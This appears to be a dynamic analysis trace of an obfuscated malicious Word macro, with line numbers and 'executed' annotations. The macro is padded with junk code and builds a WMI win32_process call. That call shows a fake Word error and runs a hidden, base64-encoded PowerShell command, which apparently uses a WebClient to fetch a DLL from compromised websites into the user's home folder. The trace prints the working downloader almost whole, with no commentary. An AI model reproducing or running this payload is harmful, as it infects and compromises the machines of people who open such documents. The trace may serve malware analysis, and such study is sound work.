                                                                                                                        Open "EMnBm.qhzCjGG.AdplaCwr" For Binary As 173

                                                                                                                        Open

                                                                                                                        69

                                                                                                                        Put # 173, , hlWxWgB

                                                                                                                        70

                                                                                                                        Close # 173

                                                                                                                        70

                                                                                                                        suyzGICEH:

                                                                                                                        72

                                                                                                                        Goto cnPZICJpM

                                                                                                                        73

                                                                                                                        Dim WKGKGYA as String

                                                                                                                        74

                                                                                                                        Dim TpbnJRCA as String

                                                                                                                        75

                                                                                                                        Open "qZLyIGBoG.pxIvxHQJ.ruafsIGOH" For Binary As 171

                                                                                                                        Open

                                                                                                                        78

                                                                                                                        Put # 171, , WKGKGYA

                                                                                                                        79

                                                                                                                        Close # 171

                                                                                                                        79

                                                                                                                        cnPZICJpM:

                                                                                                                        81

                                                                                                                        Goto nXQZvIEA

                                                                                                                        82

                                                                                                                        Dim XkQTmpt as String

                                                                                                                        83

                                                                                                                        Dim BjSOooFXD as String

                                                                                                                        84

                                                                                                                        Open "sxxLaTTrF.HCwgq.ncoBz" For Binary As 86

                                                                                                                        Open

                                                                                                                        87

                                                                                                                        Put # 86, , XkQTmpt

                                                                                                                        88

                                                                                                                        Close # 86

                                                                                                                        88

                                                                                                                        nXQZvIEA:

                                                                                                                        90

                                                                                                                        sng2 = "qq)(s2)" + "(pqq)(s2)("

                                                                                                                        91

                                                                                                                        E_gr5d7gii7nk = "qq)(s2)(roqq" + ")(s2)(qq)(s2)(ceq" + "q)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("

                                                                                                                        92

                                                                                                                        Goto PtHzDC

                                                                                                                        93

                                                                                                                        Dim ufcruVvA as String

                                                                                                                        94

                                                                                                                        Dim TIucAHET as String

                                                                                                                        95

                                                                                                                        Open "OstrD.remYG.TgODSiEJw" For Binary As 130

                                                                                                                        Open

                                                                                                                        98

                                                                                                                        Put # 130, , ufcruVvA

                                                                                                                        99

                                                                                                                        Close # 130

                                                                                                                        99

                                                                                                                        PtHzDC:

                                                                                                                        101

                                                                                                                        Goto hBvQG

                                                                                                                        102

                                                                                                                        Dim LokfC as String

                                                                                                                        103

                                                                                                                        Dim XaCoFBkF as String

                                                                                                                        104

                                                                                                                        Open "zaIoLA.TXEWrApGI.WoizH" For Binary As 239

                                                                                                                        Open

                                                                                                                        107

                                                                                                                        Put # 239, , LokfC

                                                                                                                        108

                                                                                                                        Close # 239

                                                                                                                        108

                                                                                                                        hBvQG:

                                                                                                                        110

                                                                                                                        Goto LSgRM

                                                                                                                        111

                                                                                                                        Dim mYHbrH as String

                                                                                                                        112

                                                                                                                        Dim zMifH as String

                                                                                                                        113

                                                                                                                        Open "QvCuBxUE.JkVTZJh.XniaV" For Binary As 196

                                                                                                                        Open

                                                                                                                        116

                                                                                                                        Put # 196, , mYHbrH

                                                                                                                        117

                                                                                                                        Close # 196

                                                                                                                        117

                                                                                                                        LSgRM:

                                                                                                                        119

                                                                                                                        Ozms0qq3sojl = "qq)(s2)(:wqq)(s2)(qq)(s" + "2)(inqq)(s2)(3qq)(s2)(2qq" + ")(s2)(_qq)(s2)("

                                                                                                                        120

                                                                                                                        Goto hswrCJBk

                                                                                                                        121

                                                                                                                        Dim cLvjGII as String

                                                                                                                        122

                                                                                                                        Dim AnoQaAEA as String

                                                                                                                        123

                                                                                                                        Open "wLbyGHRF.DHtWiADE.NZhmG" For Binary As 148

                                                                                                                        Open

                                                                                                                        126

                                                                                                                        Put # 148, , cLvjGII

                                                                                                                        127

                                                                                                                        Close # 148

                                                                                                                        127

                                                                                                                        hswrCJBk:

                                                                                                                        129

                                                                                                                        Goto jcwCemL

                                                                                                                        130

                                                                                                                        Dim UfERFpCEB as String

                                                                                                                        131

                                                                                                                        Dim PIypJ as String

                                                                                                                        132

                                                                                                                        Open "npKeJB.AsJFFIJ.PEOYbGOz" For Binary As 210

                                                                                                                        Open

                                                                                                                        135

                                                                                                                        Put # 210, , UfERFpCEB

                                                                                                                        136

                                                                                                                        Close # 210

                                                                                                                        136

                                                                                                                        jcwCemL:

                                                                                                                        138

                                                                                                                        Goto YeFQHW

                                                                                                                        139

                                                                                                                        Dim CLqtBBHEM as String

                                                                                                                        140

                                                                                                                        Dim mjcGEp as String

                                                                                                                        141

                                                                                                                        Open "Xfyzv.AwqqF.CSulDx" For Binary As 180

                                                                                                                        Open

                                                                                                                        144

                                                                                                                        Put # 180, , CLqtBBHEM

                                                                                                                        145

                                                                                                                        Close # 180

                                                                                                                        145

                                                                                                                        YeFQHW:

                                                                                                                        147

                                                                                                                        Nogf5r6twyl1 = "wqq)(s2)(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(t" + "qq)(s2)(qq)(s2)("

                                                                                                                        148

                                                                                                                        Goto GhPWABBAC

                                                                                                                        149

                                                                                                                        Dim PJctPBAG as String

                                                                                                                        150

                                                                                                                        Dim pAOchCdIA as String

                                                                                                                        151

                                                                                                                        Open "YPhnJPEH.HagGFmEIC.cyyfEHaR" For Binary As 238

                                                                                                                        Open

                                                                                                                        154

                                                                                                                        Put # 238, , PJctPBAG

                                                                                                                        155

                                                                                                                        Close # 238

                                                                                                                        155

                                                                                                                        GhPWABBAC:

                                                                                                                        157

                                                                                                                        Goto ZJqvCII

                                                                                                                        158

                                                                                                                        Dim TyAVHBnfu as String

                                                                                                                        159

                                                                                                                        Dim OEcMJ as String

                                                                                                                        160

                                                                                                                        Open "UHYrC.GZeVBEo.SOkEIBXGV" For Binary As 165

                                                                                                                        Open

                                                                                                                        163

                                                                                                                        Put # 165, , TyAVHBnfu

                                                                                                                        164

                                                                                                                        Close # 165

                                                                                                                        164

                                                                                                                        ZJqvCII:

                                                                                                                        166

                                                                                                                        Goto nbTgII

                                                                                                                        167

                                                                                                                        Dim AtpoQEB as String

                                                                                                                        168

                                                                                                                        Dim YEORYFEgD as String

                                                                                                                        169

                                                                                                                        Open "aejsJk.ugJxod.tsCaOC" For Binary As 178

                                                                                                                        Open

                                                                                                                        172

                                                                                                                        Put # 178, , AtpoQEB

                                                                                                                        173

                                                                                                                        Close # 178

                                                                                                                        173

                                                                                                                        nbTgII:

                                                                                                                        175

                                                                                                                        Dha2d6vv7ph7ph_v = Zgw6mqlr7l2u51 + ChrW(Yp8t40c73pqf9j6 + wdKeyS + V0ds16izbsl_xm) + Eah7s5mir8k6q8

                                                                                                                        Zgw6mqlr7l2u51

                                                                                                                        ChrW

                                                                                                                        Yp8t40c73pqf9j6

                                                                                                                        wdKeyS

                                                                                                                        V0ds16izbsl_xm

                                                                                                                        Eah7s5mir8k6q8

                                                                                                                        176

                                                                                                                        Goto pOumBJl

                                                                                                                        177

                                                                                                                        Dim ljRDIw as String

                                                                                                                        178

                                                                                                                        Dim FkZyGrH as String

                                                                                                                        179

                                                                                                                        Open "lzFAlTr.gioDBGHB.nAGbrAU" For Binary As 216

                                                                                                                        Open

                                                                                                                        182

                                                                                                                        Put # 216, , ljRDIw

                                                                                                                        183

                                                                                                                        Close # 216

                                                                                                                        183

                                                                                                                        pOumBJl:

                                                                                                                        185

                                                                                                                        Goto dvGYxIO

                                                                                                                        186

                                                                                                                        Dim qjEXJBwE as String

                                                                                                                        187

                                                                                                                        Dim wylCIDDAH as String

                                                                                                                        188

                                                                                                                        Open "DlhFJNHB.bhBvj.BSVeVFGRY" For Binary As 151

                                                                                                                        Open

                                                                                                                        191

                                                                                                                        Put # 151, , qjEXJBwE

                                                                                                                        192

                                                                                                                        Close # 151

                                                                                                                        192

                                                                                                                        dvGYxIO:

                                                                                                                        194

                                                                                                                        Goto BPUIP

                                                                                                                        195

                                                                                                                        Dim RntxcqJq as String

                                                                                                                        196

                                                                                                                        Dim RaTSTn as String

                                                                                                                        197

                                                                                                                        Open "kLAOAG.wDTBF.VrHOCGc" For Binary As 141

                                                                                                                        Open

                                                                                                                        200

                                                                                                                        Put # 141, , RntxcqJq

                                                                                                                        201

                                                                                                                        Close # 141

                                                                                                                        201

                                                                                                                        BPUIP:

                                                                                                                        203

                                                                                                                        Ji67p3vs93zl9 = Nogf5r6twyl1 + Dha2d6vv7ph7ph_v + Ozms0qq3sojl + sng2 + E_gr5d7gii7nk

                                                                                                                        204

                                                                                                                        Goto VrYJTkgJq

                                                                                                                        205

                                                                                                                        Dim YenAEIAp as String

                                                                                                                        206

                                                                                                                        Dim UeTMXOrGT as String

                                                                                                                        207

                                                                                                                        Open "BbJaFjST.Xrzpku.uVfFAHQv" For Binary As 247

                                                                                                                        Open

                                                                                                                        210

                                                                                                                        Put # 247, , YenAEIAp

                                                                                                                        211

                                                                                                                        Close # 247

                                                                                                                        211

                                                                                                                        VrYJTkgJq:

                                                                                                                        213

                                                                                                                        Goto LtmnvEE

                                                                                                                        214

                                                                                                                        Dim GfmhF as String

                                                                                                                        215

                                                                                                                        Dim qiVZhCBpC as String

                                                                                                                        216

                                                                                                                        Open "AigvGEHIB.PPCtCYDWg.gBVHiqCD" For Binary As 103

                                                                                                                        Open

                                                                                                                        219

                                                                                                                        Put # 103, , GfmhF

                                                                                                                        220

                                                                                                                        Close # 103

                                                                                                                        220

                                                                                                                        LtmnvEE:

                                                                                                                        222

                                                                                                                        Goto IWrPutAPf

                                                                                                                        223

                                                                                                                        Dim BTiPIcSF as String

                                                                                                                        224

                                                                                                                        Dim FFWrACDoa as String

                                                                                                                        225

                                                                                                                        Open "VLWvGECBE.hSxDGF.RmBdHqNjD" For Binary As 196

                                                                                                                        Open

                                                                                                                        228

                                                                                                                        Put # 196, , BTiPIcSF

                                                                                                                        229

                                                                                                                        Close # 196

                                                                                                                        229

                                                                                                                        IWrPutAPf:

                                                                                                                        231

                                                                                                                        M1_71246hql8icmf = Y94cd7j9wr9jms(Ji67p3vs93zl9)

                                                                                                                        232

                                                                                                                        Goto hVZYKBKH

                                                                                                                        233

                                                                                                                        Dim yArxc as String

                                                                                                                        234

                                                                                                                        Dim QHujBIJp as String

                                                                                                                        235

                                                                                                                        Open "jGlnHJ.WuqlLbxyF.HGhglIF" For Binary As 260

                                                                                                                        Open

                                                                                                                        238

                                                                                                                        Put # 260, , yArxc

                                                                                                                        239

                                                                                                                        Close # 260

                                                                                                                        239

                                                                                                                        hVZYKBKH:

                                                                                                                        241

                                                                                                                        Goto PJxhq

                                                                                                                        242

                                                                                                                        Dim HojJPZ as String

                                                                                                                        243

                                                                                                                        Dim NLiHLTcg as String

                                                                                                                        244

                                                                                                                        Open "DgRkGC.oezuIJ.QreJABJlU" For Binary As 126

                                                                                                                        Open

                                                                                                                        247

                                                                                                                        Put # 126, , HojJPZ

                                                                                                                        248

                                                                                                                        Close # 126

                                                                                                                        248

                                                                                                                        PJxhq:

                                                                                                                        250

                                                                                                                        Goto SELjDEG

                                                                                                                        251

                                                                                                                        Dim bqdcZF as String

                                                                                                                        252

                                                                                                                        Dim ZZTnc as String

                                                                                                                        253

                                                                                                                        Open "KjXoEi.VPFBSHI.smiQyd" For Binary As 86

                                                                                                                        Open

                                                                                                                        256

                                                                                                                        Put # 86, , bqdcZF

                                                                                                                        257

                                                                                                                        Close # 86

                                                                                                                        257

                                                                                                                        SELjDEG:

                                                                                                                        259

                                                                                                                        Set Jb9o1wbsdr9 = CreateObject(M1_71246hql8icmf)

                                                                                                                        CreateObject("winmgmtS:win32_process")

                                                                                                                        executed
                                                                                                                        260

                                                                                                                        Goto Rlclp

                                                                                                                        261

                                                                                                                        Dim IEMTiUEj as String

                                                                                                                        262

                                                                                                                        Dim lYrlEWq as String

                                                                                                                        263

                                                                                                                        Open "GlzLdHXJB.ukgsrF.MzrWIEjI" For Binary As 120

                                                                                                                        Open

                                                                                                                        266

                                                                                                                        Put # 120, , IEMTiUEj

                                                                                                                        267

                                                                                                                        Close # 120

                                                                                                                        267

                                                                                                                        Rlclp:

                                                                                                                        269

                                                                                                                        Goto FIMZH

                                                                                                                        270

                                                                                                                        Dim VAZyEDXCR as String

                                                                                                                        271

                                                                                                                        Dim iyQDTCBS as String

                                                                                                                        272

                                                                                                                        Open "iPfhytE.BYjiXI.XRadQ" For Binary As 90

                                                                                                                        Open

                                                                                                                        275

                                                                                                                        Put # 90, , VAZyEDXCR

                                                                                                                        276

                                                                                                                        Close # 90

                                                                                                                        276

                                                                                                                        FIMZH:

                                                                                                                        278

                                                                                                                        Goto CAkSJ

                                                                                                                        279

                                                                                                                        Dim cHiYNHFqI as String

                                                                                                                        280

                                                                                                                        Dim JrBDIm as String

                                                                                                                        281

                                                                                                                        Open "MuBaJAqI.JJwbBIG.xcQNDHA" For Binary As 101

                                                                                                                        Open

                                                                                                                        284

                                                                                                                        Put # 101, , cHiYNHFqI

                                                                                                                        285

                                                                                                                        Close # 101

                                                                                                                        285

                                                                                                                        CAkSJ:

                                                                                                                        287

                                                                                                                        Bzj0r4l7ded = Mid(sh2v, (5), Len(sh2v))

                                                                                                                        Mid

                                                                                                                        Len("\x01 qq)(s2)(qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(/qq)(s2)(cqq)(s2)( qq)(s2)(mqq)(s2)(sqq)(s2)(gqq)(s2)( qq)(s2)(%qq)(s2)(uqq)(s2)(sqq)(s2)(eqq)(s2)(rqq)(s2)(nqq)(s2)(aqq)(s2)(mqq)(s2)(eqq)(s2)(%qq)(s2)( qq)(s2)(/qq)(s2)(vqq)(s2)( qq)(s2)(Wqq)(s2)(oqq)(s2)(rqq)(s2)(dqq)(s2)( qq)(s2)(eqq)(s2)(xqq)(s2)(pqq)(s2)(eqq)(s2)(rqq)(s2)(iqq)(s2)(eqq)(s2)(nqq)(s2)(cqq)(s2)(eqq)(s2)(dqq)(s2)( qq)(s2)(aqq)(s2)(nqq)(s2)( qq)(s2)(eqq)(s2)(rqq)(s2)(rqq)(s2)(oqq)(s2)(rqq)(s2)( qq)(s2)(tqq)(s2)(rqq)(s2)(yqq)(s2)(iqq)(s2)(nqq)(s2)(gqq)(s2)( qq)(s2)(tqq)(s2)(oqq)(s2)( qq)(s2)(oqq)(s2)(pqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(tqq)(s2)(hqq)(s2)(eqq)(s2)( qq)(s2)(fqq)(s2)(iqq)(s2)(lqq)(s2)(eqq)(s2)(.qq)(s2)( qq)(s2)(&qq)(s2)( qq)(s2)( qq)(s2)(Pqq)(s2)(Oqq)(s2)(wqq)(s2)(eqq)(s2)(rqq)(s2)(sqq)(s2)(hqq)(s2)(eqq)(s2)(Lqq)(s2)(Lqq)(s2)( qq)(s2)(-qq)(s2)(wqq)(s2)( qq)(s2)(hqq)(s2)(iqq)(s2)(dqq)(s2)(dqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(-qq)(s2)(Eqq)(s2)(Nqq)(s2)(Cqq)(s2)(Oqq)(s2)(Dqq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( IAAqq)(s2)(gACqq)(s2)(QAYqq)(s2)(wBWqq)(s2)(AE4qq)(s2)(AZwqq)(s2)(BBAqq)(s2)(FMAqq)(s2)(PQAqq)(s2)(gAFqq)(s2)(sAVqq)(s2)(AB5qq)(s2)(AFAqq)(s2)(AZQqq)(s2)(BdAqq)(s2)(CgAqq)(s2)(IgBqq)(s2)(7ADqq)(s2)(EAfqq)(s2)(QB7qq)(s2)(ADAqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DMAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(IAfqq)(s2)(QAiqq)(s2)(AC0qq)(s2)(ARgqq)(s2)(AgAqq)(s2)(CcAqq)(s2)(WQBqq)(s2)(TAFqq)(s2)(QAZqq)(s2)(QBNqq)(s2)(AC4qq)(s2)(ASQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(TACqq)(s2)(cALqq)(s2)(AAnqq)(s2)(AFIqq)(s2)(AeQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(PACqq)(s2)(4ARqq)(s2)(ABpqq)(s2)(AHIqq)(s2)(ARQqq)(s2)(BDAqq)(s2)(FQAqq)(s2)(bwAqq)(s2)(nACqq)(s2)(kAOqq)(s2)(wAgqq)(s2)(ACAqq)(s2)(AIAqq)(s2)(BzAqq)(s2)(GUAqq)(s2)(dAAqq)(s2)(tAEqq)(s2)(kAVqq)(s2)(ABFqq)(s2)(AE0qq)(s2)(AIAqq)(s2)(AoAqq)(s2)(CIAqq)(s2)(dgBqq)(s2)(hAHqq)(s2)(IAaqq)(s2)(QBhqq)(s2)(AEIqq)(s2)(AbAqq)(s2)(BlAqq)(s2)(CIAqq)(s2)(KwAqq)(s2)(iADqq)(s2)(oAbqq)(s2)(AA2qq)(s2)(AFUqq)(s2)(AIgqq)(s2)(ArAqq)(s2)(CIAqq)(s2)(WQBqq)(s2)(IACqq)(s2)(IAKqq)(s2)(wAiqq)(s2)(AE4qq)(s2)(AIgqq)(s2)(ApAqq)(s2)(CAAqq)(s2)(IAAqq)(s2)(oAFqq)(s2)(sAVqq)(s2)(ABZqq)(s2)(AHAqq)(s2)(AZQqq)(s2)(BdAqq)(s2)(CgAqq)(s2)(IgBqq)(s2)(7ADqq)(s2)(UAfqq)(s2)(QB7qq)(s2)(ADAqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DcAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(QAfqq)(s2)(QB7qq)(s2)(ADgqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DIAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(MAfqq)(s2)(QB7qq)(s2)(ADYqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DEAqq)(s2)(fQAqq)(s2)(iACqq)(s2)(0ARqq)(s2)(gAgqq)(s2)(ACcqq)(s2)(AWQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(HAGqq)(s2)(UAcqq)(s2)(gAnqq)(s2)(ACwqq)(s2)(AJwqq)(s2)(BFAqq)(s2)(FAAqq)(s2)(bwBqq)(s2)(JACqq)(s2)(cALqq)(s2)(AAnqq)(s2)(AE4qq)(s2)(AdAqq)(s2)(BtAqq)(s2)(CcAqq)(s2)(LAAqq)(s2)(nAFqq)(s2)(QARqq)(s2)(QBNqq)(s2)(AC4qq)(s2)(ATgqq)(s2)(BlAqq)(s2)(HQAqq)(s2)(LgBqq)(s2)(zAGqq)(s2)(UAJqq)(s2)(wAsqq)(s2)(ACcqq)(s2)(Acwqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(BAGqq)(s2)(4AQqq)(s2)(QAnqq)(s2)(ACwqq)(s2)(AJwqq)(s2)(BzAqq)(s2)(CcAqq)(s2)(LAAqq)(s2)(nAFqq)(s2)(IAdqq)(s2)(gBJqq)(s2)(AGMqq)(s2)(AJwqq)(s2)(ApAqq)(s2)(CkAqq)(s2)(OwAqq)(s2)(gACqq)(s2)(QAWqq)(s2)(ABkqq)(s2)(AHoqq)(s2)(AXwqq)(s2)(B0Aqq)(s2)(F8Aqq)(s2)(aQAqq)(s2)(9ACqq)(s2)(gAJqq)(s2)(wBBqq)(s2)(AHUqq)(s2)(AJwqq)(s2)(ArAqq)(s2)(CgAqq)(s2)(JwBqq)(s2)(6ADqq)(s2)(AAeqq)(s2)(gAnqq)(s2)(ACsqq)(s2)(AJwqq)(s2)(BxAqq)(s2)(HgAqq)(s2)(JwAqq)(s2)(pACqq)(s2)(kAOqq)(s2)(wAkqq)(s2)(AFAqq)(s2)(AaQqq)(s2)(BpAqq)(s2)(DgAqq)(s2)(bwBqq)(s2)(lAGqq)(s2)(4APqq)(s2)(QAkqq)(s2)(AEIqq)(s2)(AMAqq)(s2)(B4Aqq)(s2)(GsAqq)(s2)(MAAqq)(s2)(0AHqq)(s2)(IAIqq)(s2)(AArqq)(s2)(ACAqq)(s2)(AWwqq)(s2)(BjAqq)(s2)(GgAqq)(s2)(YQBqq)(s2)(yAFqq)(s2)(0AKqq)(s2)(AA2qq)(s2)(ADQqq)(s2)(AKQqq)(s2)(AgAqq)(s2)(CsAqq)(s2)(IAAqq)(s2)(kAFqq)(s2)(YAYqq)(s2)(QBsqq)(s2)(ADYqq)(s2)(AcQqq)(s2)(BhAqq)(s2)(HgAqq)(s2)(OwAqq)(s2)(kAEqq)(s2)(wAcqq)(s2)(gBfqq)(s2)(AGwqq)(s2)(AcQqq)(s2)(BuAqq)(s2)(HcAqq)(s2)(PQAqq)(s2)(oACqq)(s2)(gAJqq)(s2)(wBQqq)(s2)(AGsqq)(s) -> 29620

                                                                                                                        executed
                                                                                                                        288

                                                                                                                        Goto NmHsEFc

                                                                                                                        289

                                                                                                                        Dim zZMYCtCAX as String

                                                                                                                        290

                                                                                                                        Dim sutvLcBD as String

                                                                                                                        291

                                                                                                                        Open "DGVxCZh.RlEFPCEb.wIwVQJJBo" For Binary As 135

                                                                                                                        Open

                                                                                                                        294

                                                                                                                        Put # 135, , zZMYCtCAX

                                                                                                                        295

                                                                                                                        Close # 135

                                                                                                                        295

                                                                                                                        NmHsEFc:

                                                                                                                        297

                                                                                                                        Goto FQNmffWt

                                                                                                                        298

                                                                                                                        Dim VlqRGAP as String

                                                                                                                        299

                                                                                                                        Dim eQxzwIAB as String

                                                                                                                        300

                                                                                                                        Open "XBCgYJ.OzLWBT.wAQnUP" For Binary As 192

                                                                                                                        Open

                                                                                                                        303

                                                                                                                        Put # 192, , VlqRGAP

                                                                                                                        304

                                                                                                                        Close # 192

                                                                                                                        304

                                                                                                                        FQNmffWt:

                                                                                                                        306

                                                                                                                        Goto bsoyVGCFI

                                                                                                                        307

                                                                                                                        Dim yghyBIF as String

                                                                                                                        308

                                                                                                                        Dim JGRXFCs as String

                                                                                                                        309

                                                                                                                        Open "glqhDDI.CLTNCt.xZeqp" For Binary As 224

                                                                                                                        Open

                                                                                                                        312

                                                                                                                        Put # 224, , yghyBIF

                                                                                                                        313

                                                                                                                        Close # 224

                                                                                                                        313

                                                                                                                        bsoyVGCFI:

                                                                                                                        315

                                                                                                                        Goto DBkFIE

                                                                                                                        316

                                                                                                                        Dim zAnUQGvFH as String

                                                                                                                        317

                                                                                                                        Dim SfMUAAHuE as String

                                                                                                                        318

                                                                                                                        Open "pDOcllCuD.lEzLut.kKCfGuBND" For Binary As 120

                                                                                                                        Open

                                                                                                                        321

                                                                                                                        Put # 120, , zAnUQGvFH

                                                                                                                        322

                                                                                                                        Close # 120

                                                                                                                        322

                                                                                                                        DBkFIE:

                                                                                                                        324

                                                                                                                        Goto MBalHjB

                                                                                                                        325

                                                                                                                        Dim JQIjO as String

                                                                                                                        326

                                                                                                                        Dim rtldCJ as String

                                                                                                                        327

                                                                                                                        Open "ZVPyGDo.KHVpyJEJI.kpQfJeY" For Binary As 72

                                                                                                                        Open

                                                                                                                        330

                                                                                                                        Put # 72, , JQIjO

                                                                                                                        331

                                                                                                                        Close # 72

                                                                                                                        331

                                                                                                                        MBalHjB:

                                                                                                                        333

                                                                                                                        Goto mMdMmt

                                                                                                                        334

                                                                                                                        Dim jCSEHHF as String

                                                                                                                        335

                                                                                                                        Dim GLLJhAEHI as String

                                                                                                                        336

                                                                                                                        Open "zDQxMR.iplzr.wAjoodIF" For Binary As 121

                                                                                                                        Open

                                                                                                                        339

                                                                                                                        Put # 121, , jCSEHHF

                                                                                                                        340

                                                                                                                        Close # 121

                                                                                                                        340

                                                                                                                        mMdMmt:

                                                                                                                        342

                                                                                                                        Jb9o1wbsdr9.Create Y94cd7j9wr9jms(Bzj0r4l7ded), Jib98w2i8chhr, N4enanrrzm_ja

                                                                                                                        SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwAp